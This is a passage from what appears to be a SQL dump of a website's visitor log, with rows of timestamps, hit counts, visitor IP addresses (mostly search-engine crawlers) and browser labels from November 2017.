0,0,'217.182.132.241','other'),(178843,1511065197,1,1,0,0,'178.154.171.88','other'),(178844,1511065345,1,1,0,0,'51.255.65.58','other'),(178845,1511065363,1,1,0,0,'51.255.65.13','other'),(178846,1511065444,1,1,0,0,'51.255.65.30','other'),(178847,1511065467,1,1,0,0,'217.182.132.57','other'),(178848,1511065601,1,1,0,0,'180.76.15.12','other'),(178849,1511065653,1,1,0,0,'217.182.132.78','other'),(178850,1511066057,1,1,0,0,'51.255.65.61','other'),(178851,1511066160,1,1,0,0,'51.255.71.127','other'),(178852,1511066218,1,1,0,0,'217.182.132.92','other'),(178853,1511066244,1,1,0,0,'217.182.132.156','other'),(178854,1511066590,1,1,0,0,'51.255.71.122','other'),(178855,1511066629,1,1,0,0,'66.249.64.30','chrome'),(178856,1511066644,1,1,0,0,'66.249.70.25','chrome'),(178857,1511066859,1,1,0,0,'217.182.132.84','other'),(178858,1511068657,1,1,0,0,'51.255.65.43','other'),(178859,1511069406,1,0,1,0,'66.249.64.28',''),(178860,1511069742,1,1,0,0,'51.255.71.122','other'),(178861,1511069758,1,1,0,0,'217.182.132.29','other'),(178862,1511069894,1,1,0,0,'164.132.162.187','other'),(178863,1511069985,1,1,0,0,'8.29.198.26','other'),(178864,1511070865,1,1,0,0,'217.182.132.51','other'),(178865,1511071512,1,1,0,0,'151.80.27.118','other'),(178866,1511071529,1,1,0,0,'51.255.65.23','other'),(178867,1511071728,7,7,0,0,'46.229.168.74','other'),(178868,1511071742,4,4,0,0,'46.229.168.76','other'),(178869,1511071788,1,1,0,0,'151.80.27.116','other'),(178870,1511071806,3,3,0,0,'46.229.168.67','other'),(178871,1511071843,3,3,0,0,'46.229.168.73','other'),(178872,1511071864,7,7,0,0,'46.229.168.66','other'),(178873,1511071876,6,6,0,0,'46.229.168.79','other'),(178874,1511071903,5,5,0,0,'46.229.168.80','other'),(178875,1511071924,4,4,0,0,'46.229.168.65','other'),(178876,1511071981,3,3,0,0,'46.229.168.77','other'),(178877,1511072029,7,7,0,0,'46.229.168.71','other'),(178878,1511072109,7,7,0,0,'46.229.168.69','other'),(178879,1511072280,6,6,0,0,'46.229.168.75','other'),(178880,1511072362,6,6,0,0,'46.229.168.70','other'),(178881,1511072607,7,7,0,0,'46.229.168.72','other'),(178882,1511072796,1,1,0,0,'87.250.224.46','other'),(178883,1511072806,8,8,0,0,'46.229.168.76','other'),(178884,1511072828,7,7,0,0,'46.229.168.67','other'),(178885,1511072847,2,2,0,0,'46.229.168.73','other'),(178886,1511072879,1,1,0,0,'51.255.65.71','other'),(178887,1511072926,4,4,0,0,'46.229.168.77','other'),(178888,1511072985,1,1,0,0,'128.69.212.131','msie'),(178889,1511072992,2,2,0,0,'46.229.168.79','other'),(178890,1511073009,5,5,0,0,'46.229.168.65','other'),(178891,1511073035,1,1,0,0,'51.255.71.121','other'),(178892,1511073064,6,6,0,0,'46.229.168.71','other'),(178893,1511073188,6,6,0,0,'46.229.168.80','other'),(178894,1511073301,5,5,0,0,'46.229.168.69','other'),(178895,1511073313,8,8,0,0,'46.229.168.70','other'),(178896,1511073341,1,1,0,0,'217.182.132.66','other'),(178897,1511073358,1,1,0,0,'51.255.65.7','other'),(178898,1511073361,5,5,0,0,'46.229.168.66','other'),(178899,1511073538,2,2,0,0,'46.229.168.72','other'),(178900,1511073550,1,1,0,0,'157.55.39.229','other'),(178901,1511073591,1,1,0,0,'51.255.65.14','other'),(178902,1511073621,1,1,0,0,'164.132.162.157','other'),(178903,1511073668,6,6,0,0,'46.229.168.74','other'),(178904,1511073758,3,3,0,0,'46.229.168.76','other'),(178905,1511073772,2,2,0,0,'51.255.65.36','other'),(178906,1511073909,1,1,0,0,'51.255.65.12','other'),(178907,1511073963,6,6,0,0,'46.229.168.73','other'),(178908,1511073996,5,5,0,0,'46.229.168.67','other'),(178909,1511074008,1,1,0,0,'51.255.65.2','other'),(178910,1511074014,3,3,0,0,'46.229.168.79','other'),(178911,1511074090,6,6,0,0,'46.229.168.75','other'),(178912,1511074255,7,7,0,0,'46.229.168.69','other'),(178913,1511074304,2,2,0,0,'46.229.168.70','other'),(178914,1511074319,4,4,0,0,'46.229.168.80','other'),(178915,1511074338,5,5,0,0,'46.229.168.71','other'),(178916,1511074366,3,3,0,0,'46.229.168.66','other'),(178917,1511074407,5,5,0,0,'46.229.168.77','other'),(178918,1511074503,4,4,0,0,'46.229.168.65','other'),(178919,1511074700,6,6,0,0,'46.229.168.74','other'),(178920,1511074716,5,5,0,0,'46.229.168.72','other'),(178921,1511074975,10,10,0,0,'46.229.168.73','other'),(178922,1511075054,7,7,0,0,'46.229.168.67','other'),(178923,1511075157,4,4,0,0,'46.229.168.69','other'),(178924,1511075189,3,3,0,0,'46.229.168.79','other'),(178925,1511075207,1,1,0,0,'217.182.132.151','other'),(178926,1511075252,10,10,0,0,'46.229.168.71','other'),(178927,1511075263,9,9,0,0,'46.229.168.80','other'),(178928,1511075371,4,4,0,0,'46.229.168.70','other'),(178929,1511075384,1,1,0,0,'217.182.132.82','other'),(178930,1511075560,5,5,0,0,'46.229.168.77','other'),(178931,1511075594,1,1,0,0,'87.250.224.46','other'),(178932,1511075618,1,1,0,0,'46.229.168.76','other'),(178933,1511075687,7,7,0,0,'46.229.168.66','other'),(178934,1511075716,1,1,0,0,'46.229.168.65','other'),(178935,1511075742,3,3,0,0,'46.229.168.72','other'),(178936,1511075784,10,10,0,0,'46.229.168.74','other'),(178937,1511075885,10,10,0,0,'46.229.168.73','other'),(178938,1511076023,3,3,0,0,'46.229.168.67','other'),(178939,1511076119,4,4,0,0,'46.229.168.79','other'),(178940,1511076198,3,3,0,0,'46.229.168.80','other'),(178941,1511076214,1,1,0,0,'217.182.132.179','other'),(178942,1511076226,1,1,0,0,'51.255.65.80','other'),(178943,1511076261,1,1,0,0,'51.255.65.21','other'),(178944,1511076340,1,1,0,0,'51.255.65.93','other'),(178945,1511076373,3,3,0,0,'46.229.168.70','other'),(178946,1511076518,1,1,0,0,'46.229.168.69','other'),(178947,1511077104,1,1,0,0,'66.249.64.30','chrome'),(178948,1511077108,1,1,0,0,'66.249.70.25','chrome'),(178949,1511077253,1,1,0,0,'188.163.99.85','chrome'),(178950,1511077702,1,1,0,0,'216.244.66.237','other'),(178951,1511078094,2,2,0,0,'141.8.142.74','other'),(178952,1511078205,1,1,0,0,'164.132.162.187','other'),(178953,1511078365,1,0,1,0,'66.249.64.29',''),(178954,1511078532,1,1,0,0,'51.255.65.6','other'),(178955,1511078829,1,1,0,0,'217.182.132.17','other'),(178956,1511079039,1,1,0,0,'178.154.171.88','other'),(178957,1511079153,1,0,1,0,'66.249.70.27',''),(178958,1511079426,2,2,0,0,'87.250.224.46','other'),(178959,1511079862,2,2,0,0,'37.9.113.182','other'),(178960,1511079902,1,1,0,0,'51.255.65.93','other'),(178961,1511080548,1,1,0,0,'216.244.66.237','other'),(178962,1511080811,1,1,0,0,'8.29.198.26','other'),(178963,1511081316,1,1,0,0,'141.8.132.19','other'),(178964,1511081996,1,1,0,0,'216.244.66.237','other'),(178965,1511082121,2,2,0,0,'66.249.64.30','chrome'),(178966,1511082124,1,1,0,0,'66.249.70.27','chrome'),(178967,1511082307,1,0,1,0,'66.249.64.29',''),(178968,1511082522,1,1,0,0,'137.74.207.188','other'),(178969,1511083514,1,1,0,0,'207.46.13.178','other'),(178970,1511083575,1,1,0,0,'217.182.132.31','other'),(178971,1511083831,1,1,0,0,'51.255.71.100','other'),(178972,1511083869,1,1,0,0,'51.255.65.36','other'),(178973,1511084459,1,1,0,0,'51.255.65.52','other'),(178974,1511084493,1,1,0,0,'66.249.64.28','chrome'),(178975,1511084604,1,1,0,0,'217.182.132.61','other'),(178976,1511084721,1,1,0,0,'51.255.65.85','other'),(178977,1511084789,3,3,0,0,'95.10.178.194','other'),(178978,1511085642,1,1,0,0,'37.55.57.49','chrome'),(178979,1511085916,1,1,0,0,'66.249.64.28','chrome'),(178980,1511085919,1,1,0,0,'66.249.70.25','chrome'),(178981,1511086020,1,1,0,0,'37.9.113.134','other'),(178982,1511087991,1,1,0,0,'51.255.71.123','other'),(178983,1511088122,1,1,0,0,'51.255.65.84','other'),(178984,1511088376,1,1,0,0,'141.8.132.19','other'),(178985,1511088501,1,1,0,0,'217.182.132.16','other'),(178986,1511088756,1,1,0,0,'217.182.132.66','other'),(178987,1511088771,1,1,0,0,'85.21.233.180','other'),(178988,1511089001,1,1,0,0,'141.8.142.74','other'),(178989,1511089182,1,1,0,0,'51.255.65.42','other'),(178990,1511089337,1,1,0,0,'216.244.66.237','other'),(178991,1511089342,1,0,1,0,'66.249.64.28',''),(178992,1511089466,1,1,0,0,'217.182.132.186','other'),(178993,1511089696,1,1,0,0,'51.255.65.27','other'),(178994,1511089810,1,1,0,0,'217.182.132.60','other'),(178995,1511090347,1,1,0,0,'217.182.132.91','other'),(178996,1511090967,1,1,0,0,'217.182.132.67','other'),(178997,1511091187,1,1,0,0,'37.55.57.49','firefox'),(178998,1511091317,1,1,0,0,'37.9.113.134','other'),(178999,1511091325,1,1,0,0,'66.249.64.28','chrome'),(179000,1511091330,1,1,0,0,'66.249.70.25','chrome'),(179001,1511091623,1,1,0,0,'95.108.213.24','other'),(179002,1511091637,1,1,0,0,'8.29.198.26','other'),(179003,1511091925,1,1,0,0,'164.132.164.180','other'),(179004,1511092445,1,1,0,0,'51.255.65.85','other'),(179005,1511092692,1,0,1,0,'66.249.64.28',''),(179006,1511092752,1,1,0,0,'217.182.132.77','other'),(179007,1511092935,1,1,0,0,'217.182.132.19','other'),(179008,1511092942,1,1,0,0,'91.209.11.236','other'),(179009,1511093053,2,0,2,0,'66.249.70.27',''),(179010,1511093079,1,1,0,0,'178.154.200.7','other'),(179011,1511093154,3,3,0,0,'66.249.64.30','chrome'),(179012,1511093201,1,1,0,0,'66.249.64.29','chrome'),(179013,1511093228,1,1,0,0,'51.255.65.35','other'),(179014,1511093285,1,1,0,0,'137.74.207.120','other'),(179015,1511093760,1,1,0,0,'37.9.113.74','other'),(179016,1511094389,2,0,2,0,'66.249.64.29',''),(179017,1511094406,2,0,2,0,'66.249.64.28',''),(179018,1511094526,3,2,1,0,'66.249.64.28',''),(179019,1511095150,1,0,1,0,'66.249.70.29',''),(179020,1511095244,1,1,0,0,'51.255.65.28','other'),(179021,1511095362,1,1,0,0,'66.249.64.28','chrome'),(179022,1511095381,1,1,0,0,'37.9.113.74','other'),(179023,1511095440,1,0,1,0,'66.249.70.27',''),(179024,1511095671,1,1,0,0,'137.74.207.114','other'),(179025,1511096681,1,1,0,0,'66.249.64.30','chrome'),(179026,1511096996,1,0,1,0,'66.249.64.28',''),(179027,1511097197,3,1,2,0,'66.249.64.28',''),(179028,1511097848,1,0,1,0,'66.249.64.30',''),(179029,1511097902,1,1,0,0,'217.182.132.90','other'),(179030,1511097948,1,1,0,0,'51.255.65.73','other'),(179031,1511098280,1,0,1,0,'66.249.64.29',''),(179032,1511098489,1,1,0,0,'51.255.65.59','other'),(179033,1511098499,1,0,1,0,'66.249.64.28',''),(179034,1511098641,1,1,0,0,'180.76.15.139','other'),(179035,1511098911,1,1,0,0,'51.255.65.19','other'),(179036,1511098955,1,1,0,0,'66.249.70.29','chrome'),(179037,1511099365,1,1,0,0,'217.182.132.157','other'),(179038,1511099375,1,1,0,0,'137.74.207.159','other'),(179039,1511099490,1,1,0,0,'178.154.171.55','other'),(179040,1511099657,1,1,0,0,'66.249.64.28','chrome'),(179041,1511099688,1,1,0,0,'217.182.132.94','other'),(179042,1511100350,1,1,0,0,'91.209.11.236','other'),(179043,1511100610,2,1,1,0,'66.249.64.29',''),(179044,1511100624,1,1,0,0,'157.55.39.246','other'),(179045,1511100660,1,1,0,0,'217.182.132.30','other'),(179046,1511100941,1,0,1,0,'66.249.70.25',''),(179047,1511100945,1,1,0,0,'217.182.132.150','other'),(179048,1511101032,1,1,0,0,'66.249.64.30','chrome'),(179049,1511101325,1,1,0,0,'66.249.70.27','chrome'),(179050,1511101540,1,1,0,0,'217.182.132.7','other'),(179051,1511101714,1,1,0,0,'188.166.76.195','chrome'),(179052,1511102461,1,1,0,0,'8.29.198.25','other'),(179053,1511102656,1,1,0,0,'51.255.65.48','other'),(179054,1511102852,1,0,1,0,'66.249.70.27',''),(179055,1511102861,1,1,0,0,'157.55.39.229','other'),(179056,1511102992,1,1,0,0,'217.182.132.15','other'),(179057,1511103080,1,1,0,0,'5.45.207.69','other'),(179058,1511103373,1,1,0,0,'51.255.71.120','other'),(179059,1511103599,1,1,0,0,'91.196.178.72','firefox'),(179060,1511103810,1,1,0,0,'51.255.65.4','other'),(179061,1511103892,1,1,0,0,'66.249.70.25','chrome'),(179062,1511104110,1,1,0,0,'157.55.39.246','other'),(179063,1511104365,1,1,0,0,'37.54.21.213','chrome'),(179064,1511104493,1,1,0,0,'180.76.15.7','other'),(179065,1511104518,1,1,0,0,'217.182.132.176','other'),(179066,1511104712,1,1,0,0,'37.73.203.58','chrome'),(179067,1511104782,1,1,0,0,'217.182.132.28','other'),(179068,1511104836,1,1,0,0,'51.255.71.128','other'),(179069,1511104912,1,1,0,0,'217.182.132.74','other'),(179070,1511104971,1,0,1,0,'66.249.64.28',''),(179071,1511105254,1,0,1,0,'66.249.70.25',''),(179072,1511105345,1,1,0,0,'51.255.65.80','other'),(179073,1511105590,2,2,0,0,'217.182.132.32','other'),(179074,1511105760,1,1,0,0,'93.85.63.87','firefox'),(179075,1511105761,1,1,0,0,'217.182.132.7','other'),(179076,1511105874,1,1,0,0,'51.255.65.65','other'),(179077,1511106049,1,1,0,0,'217.182.132.30','other'),(179078,1511106157,1,1,0,0,'137.74.207.164','other'),(179079,1511106713,1,1,0,0,'217.182.132.186','other'),(179080,1511106958,1,1,0,0,'217.182.132.63','other'),(179081,1511107232,1,1,0,0,'216.244.66.237','other'),(179082,1511107349,1,1,0,0,'137.74.207.110','other'),(179083,1511107398,1,1,0,0,'217.182.132.185','other'),(179084,1511107477,1,1,0,0,'51.255.65.83','other'),(179085,1511107900,3,1,2,0,'66.249.64.29',''),(179086,1511108082,1,1,0,0,'66.249.70.29','chrome'),(179087,1511108479,1,1,0,0,'54.165.59.7','other'),(179088,1511108493,1,1,0,0,'180.76.15.7','other'),(179089,1511108776,1,1,0,0,'157.55.39.125','other'),(179090,1511109155,1,0,1,0,'66.249.64.28',''),(179091,1511109666,1,1,0,0,'95.108.213.24','other'),(179092,1511109745,1,1,0,0,'51.255.65.25','other'),(179093,1511109775,1,1,0,0,'51.255.71.117','other'),(179094,1511109784,1,1,0,0,'51.255.65.23','other'),(179095,1511109874,1,1,0,0,'51.255.65.8','other'),(179096,1511110162,1,1,0,0,'178.154.200.8','other'),(179097,1511110322,2,0,2,0,'66.249.64.29',''),(179098,1511110540,1,1,0,0,'37.9.113.60','other'),(179099,1511110889,1,1,0,0,'207.46.13.178','other'),(179100,1511111044,1,1,0,0,'37.9.113.101','other'),(179101,1511111179,1,1,0,0,'137.74.207.161','other'),(179102,1511111182,2,2,0,0,'54.165.59.7','other'),(179103,1511111325,1,1,0,0,'37.9.113.186','other'),(179104,1511111384,1,1,0,0,'51.255.65.50','other'),(179105,1511111806,1,1,0,0,'51.255.71.111','other'),(179106,1511111969,1,1,0,0,'5.45.207.82','other'),(179107,1511112019,1,0,1,0,'66.249.64.29',''),(179108,1511112578,1,1,0,0,'137.74.201.108','other'),(179109,1511113036,1,1,0,0,'213.180.203.8','other'),(179110,1511113040,1,1,0,0,'37.9.113.80','other'),(179111,1511113091,2,2,0,0,'141.8.142.29','other'),(179112,1511113173,1,1,0,0,'54.165.59.7','other'),(179113,1511113234,1,1,0,0,'51.255.65.13','other'),(179114,1511113241,1,1,0,0,'37.9.113.138','other'),(179115,1511113290,1,1,0,0,'8.29.198.27','other'),(179116,1511113351,1,1,0,0,'66.249.64.30','chrome'),(179117,1511113397,1,1,0,0,'66.249.70.27','chrome'),(179118,1511113598,1,1,0,0,'51.255.65.18','other'),(179119,1511113880,1,1,0,0,'188.32.189.118','msie'),(179120,1511114021,1,1,0,0,'51.255.65.27','other'),(179121,1511114034,1,1,0,0,'66.249.64.29','chrome'),(179122,1511115031,1,1,0,0,'217.182.132.174','other'),(179123,1511115157,1,1,0,0,'87.250.224.39','other'),(179124,1511115608,1,1,0,0,'37.9.113.138','other'),(179125,1511115617,1,1,0,0,'217.182.132.51','other'),(179126,1511115978,1,1,0,0,'162.210.196.97','other'),(179127,1511116168,1,1,0,0,'51.255.71.101','other'),(179128,1511117191,1,1,0,0,'51.255.65.86','other'),(179129,1511117536,1,1,0,0,'217.182.132.187','other'),(179130,1511117774,1,0,1,0,'66.249.64.30',''),(179131,1511118414,1,1,0,0,'66.249.64.28','chrome'),(179132,1511118417,1,1,0,0,'66.249.70.29','chrome'),(179133,1511118963,1,1,0,0,'37.9.113.132','other'),(179134,1511118970,1,1,0,0,'141.8.142.123','other'),(179135,1511119037,1,1,0,0,'164.132.162.154','other'),(179136,1511119136,1,1,0,0,'213.180.203.8','other'),(179137,1511119227,1,1,0,0,'157.55.39.229','other'),(179138,1511119450,1,1,0,0,'5.45.207.83','other'),(179139,1511119681,1,1,0,0,'37.9.113.186','other'),(179140,1511119803,1,0,1,0,'66.249.64.28',''),(179141,1511119804,1,1,0,0,'87.250.224.39','other'),(179142,1511119876,1,1,0,0,'141.8.132.22','other'),(179143,1511119880,1,1,0,0,'37.9.113.63','other'),(179144,1511120083,1,1,0,0,'178.154.200.28','other'),(179145,1511120324,2,2,0,0,'207.46.13.178','other'),(179146,1511121256,1,1,0,0,'141.8.142.126','other'),(179147,1511121644,1,0,1,0,'66.249.64.28',''),(179148,1511121757,1,1,0,0,'217.182.132.72','other'),(179149,1511121772,1,1,0,0,'51.255.65.96','other'),(179150,1511122263,1,1,0,0,'87.250.224.39','other'),(179151,1511122273,1,1,0,0,'51.255.65.55','other'),(179152,1511122413,1,1,0,0,'217.182.132.52','other'),(179153,1511122541,1,1,0,0,'82.207.113.33','firefox'),(179154,1511122553,1,1,0,0,'51.255.65.10','other'),(179155,1511122843,1,1,0,0,'87.250.224.125','other'),(179156,1511122850,1,1,0,0,'178.154.171.4','other'),(179157,1511122939,1,1,0,0,'51.255.65.87','other'),(179158,1511123248,1,1,0,0,'178.154.171.10','other'),(179159,1511123792,3,3,0,0,'87.250.224.46','other'),(179160,1511123799,1,1,0,0,'66.249.64.30','chrome'),(179161,1511123803,1,1,0,0,'66.249.70.29','chrome'),(179162,1511123999,1,1,0,0,'217.182.132.15','other'),(179163,1511124117,1,1,0,0,'8.29.198.25','other'),(179164,1511124170,1,1,0,0,'51.255.65.46','other'),(179165,1511124748,1,0,1,0,'66.249.64.30',''),(179166,1511124922,1,1,0,0,'141.8.142.74','other'),(179167,1511125336,1,1,0,0,'178.154.171.88','other'),(179168,1511125501,1,1,0,0,'87.250.224.46','other'),(179169,1511125736,1,1,0,0,'51.255.65.57','other'),(179170,1511126687,1,1,0,0,'157.55.39.229','other'),(179171,1511126815,1,0,1,0,'66.249.64.28',''),(179172,1511126914,2,2,0,0,'178.154.171.88','other'),(179173,1511127579,1,0,1,0,'66.249.70.27',''),(179174,1511127660,1,1,0,0,'217.182.132.25','other'),(179175,1511127892,1,1,0,0,'141.8.142.74','other'),(179176,1511128085,3,3,0,0,'178.154.171.88','other'),(179177,1511128285,1,1,0,0,'217.182.132.184','other'),(179178,1511128385,1,1,0,0,'51.255.65.3','other'),(179179,1511128569,1,1,0,0,'51.255.71.114','other'),(179180,1511128658,1,1,0,0,'37.73.232.108','chrome'),(179181,1511128737,1,1,0,0,'137.74.207.102','other'),(179182,1511128781,1,1,0,0,'207.46.13.178','other'),(179183,1511129114,1,1,0,0,'66.249.64.28','chrome'),(179184,1511129118,1,1,0,0,'66.249.70.29','chrome'),(179185,1511129180,1,1,0,0,'137.74.201.108','other'),(179186,1511129409,1,1,0,0,'51.255.71.131','other'),(179187,1511130030,1,1,0,0,'137.74.207.114','other'),(179188,1511130053,1,1,0,0,'51.255.65.87','other'),(179189,1511130071,1,0,1,0,'66.249.70.29',''),(179190,1511130093,1,1,0,0,'164.132.162.156','other'),(179191,1511130235,1,0,1,0,'66.249.70.25',''),(179192,1511130650,2,2,0,0,'157.55.39.246','other'),(179193,1511131112,1,1,0,0,'157.55.39.125','other'),(179194,1511131273,1,1,0,0,'51.255.65.77','other'),(179195,1511131481,2,2,0,0,'157.55.39.229','other'),(179196,1511131891,1,0,1,0,'66.249.64.28',''),(179197,1511131979,1,0,1,0,'66.249.64.29',''),(179198,1511132046,1,1,0,0,'87.250.224.46','other'),(179199,1511132532,1,1,0,0,'217.182.132.56','other'),(179200,1511132612,1,1,0,0,'51.255.65.94','other'),(179201,1511132614,1,1,0,0,'51.255.65.92','other'),(179202,1511133185,1,1,0,0,'164.132.162.187','other'),(179203,1511133407,2,2,0,0,'37.9.113.101','other'),(179204,1511133805,1,1,0,0,'87.250.224.46','other'),(179205,1511133887,1,1,0,0,'207.46.13.178','other'),(179206,1511134234,1,0,1,0,'66.249.64.30',''),(179207,1511134352,1,1,0,0,'5.45.207.82','other'),(179208,1511134493,1,1,0,0,'66.249.64.29','chrome'),(179209,1511134497,1,1,0,0,'66.249.70.29','chrome'),(179210,1511134694,1,1,0,0,'217.182.132.188','other'),(179211,1511134817,1,1,0,0,'178.154.171.81','other'),(179212,1511134826,1,1,0,0,'217.182.132.153','other'),(179213,1511134863,1,1,0,0,'217.182.132.76','other'),(179214,1511134954,1,1,0,0,'8.29.198.27','other'),(179215,1511136441,2,2,0,0,'141.8.142.74','other'),(179216,1511136486,1,1,0,0,'66.249.64.28','chrome'),(179217,1511136674,1,1,0,0,'217.182.132.240','other'),(179218,1511137022,1,1,0,0,'217.182.132.95','other'),(179219,1511137058,1,1,0,0,'217.182.132.17','other'),(179220,1511137845,1,1,0,0,'157.55.39.246','other'),(179221,1511138054,1,1,0,0,'217.182.132.240','other'),(179222,1511138121,1,1,0,0,'51.255.65.14','other'),(179223,1511138321,1,1,0,0,'141.8.142.74','other'),(179224,1511138372,2,1,1,0,'66.249.70.27',''),(179225,1511138382,1,1,0,0,'87.250.224.46','other'),(179226,1511139180,1,1,0,0,'51.255.65.90','other'),(179227,1511139713,1,1,0,0,'164.132.162.155','other'),(179228,1511139911,1,1,0,0,'199.30.24.41','other'),(179229,1511140096,1,1,0,0,'217.182.132.16','other'),(179230,1511140244,1,1,0,0,'51.255.65.85','other'),(179231,1511140397,1,1,0,0,'51.255.71.115','other'),(179232,1511140426,1,1,0,0,'178.154.200.32','other'),(179233,1511140586,1,1,0,0,'51.255.65.72','other'),(179234,1511140734,1,1,0,0,'89.178.238.106','chrome'),(179235,1511140736,1,1,0,0,'46.251.75.215','chrome'),(179236,1511140794,1,1,0,0,'51.255.71.128','other'),(179237,1511140822,1,1,0,0,'51.255.65.54','other'),(179238,1511140963,2,2,0,0,'217.182.132.154','other'),(179239,1511141065,1,1,0,0,'51.255.65.68','other'),(179240,1511141220,1,1,0,0,'217.182.132.176','other'),(179241,1511141601,1,1,0,0,'217.182.132.175','other'),(179242,1511141935,1,1,0,0,'217.182.132.57','other'),(179243,1511142042,1,1,0,0,'217.182.132.24','other'),(179244,1511142699,1,1,0,0,'66.249.64.28','chrome'),(179245,1511143032,1,1,0,0,'51.255.65.65','other'),(179246,1511143475,1,1,0,0,'217.182.132.97','other'),(179247,1511143504,1,1,0,0,'66.249.70.27','chrome'),(179248,1511143722,1,1,0,0,'51.255.66.102','other'),(179249,1511143862,1,1,0,0,'66.249.64.29','chrome'),(179250,1511144008,1,0,1,0,'66.249.70.25',''),(179251,1511144326,1,0,1,0,'66.249.64.30',''),(179252,1511144459,1,1,0,0,'217.182.132.87','other'),(179253,1511144634,1,1,0,0,'51.255.65.37','other'),(179254,1511144783,1,1,0,0,'51.255.65.30','other'),(179255,1511145018,1,1,0,0,'40.77.167.48','other'),(179256,1511145265,1,1,0,0,'51.255.65.96','other'),(179257,1511145348,1,1,0,0,'164.132.162.157','other'),(179258,1511145469,2,2,0,0,'51.255.65.55','other'),(179259,1511145785,1,1,0,0,'8.29.198.27','other'),(179260,1511145892,1,0,1,0,'66.249.64.30',''),(179261,1511146155,1,1,0,0,'51.255.65.76','other'),(179262,1511146236,1,1,0,0,'217.182.132.5','other'),(179263,1511146573,1,1,0,0,'51.255.65.6','other'),(179264,1511147223,1,1,0,0,'217.182.132.30','other'),(179265,1511147375,1,1,0,0,'217.182.132.182','other'),(179266,1511147619,1,0,1,0,'66.249.70.27',''),(179267,1511147672,1,0,1,0,'66.249.64.30',''),(179268,1511148191,1,0,1,0,'66.249.70.29',''),(179269,1511148237,1,1,0,0,'178.140.81.12','msie'),(179270,1511148357,1,0,1,0,'66.249.65.105',''),(179271,1511148531,1,1,0,0,'217.182.132.175','other'),(179272,1511148594,1,1,0,0,'51.255.65.82','other'),(179273,1511148682,1,1,0,0,'217.182.132.148','other'),(179274,1511149208,1,1,0,0,'51.255.65.54','other'),(179275,1511149223,1,1,0,0,'51.255.71.129','other'),(179276,1511149273,14,14,0,0,'46.4.58.130','other'),(179277,1511149299,1,1,0,0,'66.249.70.27','chrome'),(179278,1511149323,1,1,0,0,'66.249.64.29','chrome'),(179279,1511149526,1,1,0,0,'178.154.171.88','other'),(179280,1511149914,1,1,0,0,'94.76.92.157','firefox'),(179281,1511150024,1,1,0,0,'217.182.132.241','other'),(179282,1511150540,1,1,0,0,'217.182.132.61','other'),(179283,1511150915,1,1,0,0,'217.182.132.187','other'),(179284,1511151173,1,1,0,0,'141.8.142.74','other'),(179285,1511152892,1,1,0,0,'141.8.142.74','other'),(179286,1511152947,1,1,0,0,'54.165.59.7','other'),(179287,1511153195,1,1,0,0,'217.182.132.55','other'),(179288,1511153782,2,0,2,0,'66.249.64.29',''),(179289,1511154101,1,1,0,0,'141.8.142.74','other'),(179290,1511154218,1,1,0,0,'66.249.70.25','chrome'),(179291,1511154222,1,1,0,0,'66.249.64.30','chrome'),(179292,1511155186,1,1,0,0,'217.182.132.81','other'),(179293,1511156169,1,1,0,0,'217.182.132.177','other'),(179294,1511156238,1,1,0,0,'137.74.207.114','other'),(179295,1511156486,1,1,0,0,'178.154.171.88','other'),(179296,1511156615,1,1,0,0,'8.29.198.25','other'),(179297,1511156686,1,1,0,0,'51.255.65.18','other'),(179298,1511157166,1,1,0,0,'141.8.142.74','other'),(179299,1511157557,1,1,0,0,'66.249.70.29','chrome'),(179300,1511157560,3,3,0,0,'66.249.64.29','chrome'),(179301,1511157794,1,1,0,0,'217.182.132.28','other'),(179302,1511158632,2,1,1,0,'66.249.64.28',''),(179303,1511158701,1,1,0,0,'51.255.65.7','other'),(179304,1511158865,1,1,0,0,'40.77.167.59','other'),(179305,1511159250,1,1,0,0,'217.182.132.73','other'),(179306,1511159519,1,1,0,0,'91.196.178.65','chrome'),(179307,1511159534,1,1,0,0,'51.255.65.5','other'),(179308,1511159601,1,1,0,0,'217.182.132.241','other'),(179309,1511159752,1,1,0,0,'51.255.65.97','other'),(179310,1511159754,1,1,0,0,'217.182.132.95','other'),(179311,1511159799,1,1,0,0,'37.53.117.68','chrome'),(179312,1511160013,1,1,0,0,'51.255.71.125','other'),(179313,1511160130,1,0,1,0,'66.249.70.27',''),(179314,1511160157,1,1,0,0,'217.182.132.151','other'),(179315,1511160610,1,1,0,0,'51.255.71.115','other'),(179316,1511160769,1,0,1,0,'66.249.64.28',''),(179317,1511160929,1,1,0,0,'91.196.178.66','chrome'),(179318,1511160953,1,1,0,0,'51.255.65.2','other'),(179319,1511161089,1,1,0,0,'51.255.65.97','other'),(179320,1511161820,1,1,0,0,'188.166.22.31','chrome'),(179321,1511161876,1,1,0,0,'217.182.132.186','other'),(179322,1511161950,1,1,0,0,'87.250.224.46','other'),(179323,1511162129,1,1,0,0,'91.196.178.70','chrome'),(179324,1511162399,1,1,0,0,'217.182.132.80','other'),(179325,1511162589,1,1,0,0,'93.190.138.9','chrome'),(179326,1511162669,1,1,0,0,'141.8.142.74','other'),(179327,1511162752,1,1,0,0,'51.255.65.80','other'),(179328,1511162823,1,1,0,0,'51.255.65.54','other'),(179329,1511162915,1,1,0,0,'91.196.178.66','firefox'),(179330,1511163051,1,1,0,0,'178.154.200.32','other'),(179331,1511163721,1,1,0,0,'93.74.212.147','firefox'),(179332,1511163769,1,1,0,0,'51.255.71.126','other'),(179333,1511163884,1,1,0,0,'66.249.64.30','chrome'),(179334,1511164028,1,1,0,0,'51.255.65.32','other'),(179335,1511164109,2,2,0,0,'178.154.171.88','other'),(179336,1511164320,1,1,0,0,'51.255.65.73','other'),(179337,1511164381,2,2,0,0,'40.77.167.59','other'),(179338,1511164499,1,1,0,0,'91.196.178.66','firefox'),(179339,1511164636,1,1,0,0,'91.196.178.65','chrome'),(179340,1511164648,1,1,0,0,'51.255.71.131','other'),(179341,1511164844,1,1,0,0,'66.249.70.27','chrome'),(179342,1511165140,1,1,0,0,'37.9.113.182','other'),(179343,1511165144,1,1,0,0,'178.154.171.88','other'),(179344,1511165148,1,1,0,0,'217.182.132.183','other'),(179345,1511165264,3,3,0,0,'141.8.142.74','other'),(179346,1511165802,1,1,0,0,'91.196.178.65','chrome'),(179347,1511165854,1,0,1,0,'66.249.64.29',''),(179348,1511165898,2,2,0,0,'95.213.141.126','opera'),(179349,1511165966,1,1,0,0,'91.196.178.162','chrome'),(179350,1511166692,2,0,2,0,'66.249.64.30',''),(179351,1511166730,1,1,0,0,'87.250.224.46','other'),(179352,1511166856,1,1,0,0,'91.196.178.65','chrome'),(179353,1511166905,2,2,0,0,'54.165.59.7','other'),(179354,1511166928,1,1,0,0,'141.8.142.74','other'),(179355,1511166963,1,1,0,0,'164.132.162.155','other'),(179356,1511166966,1,1,0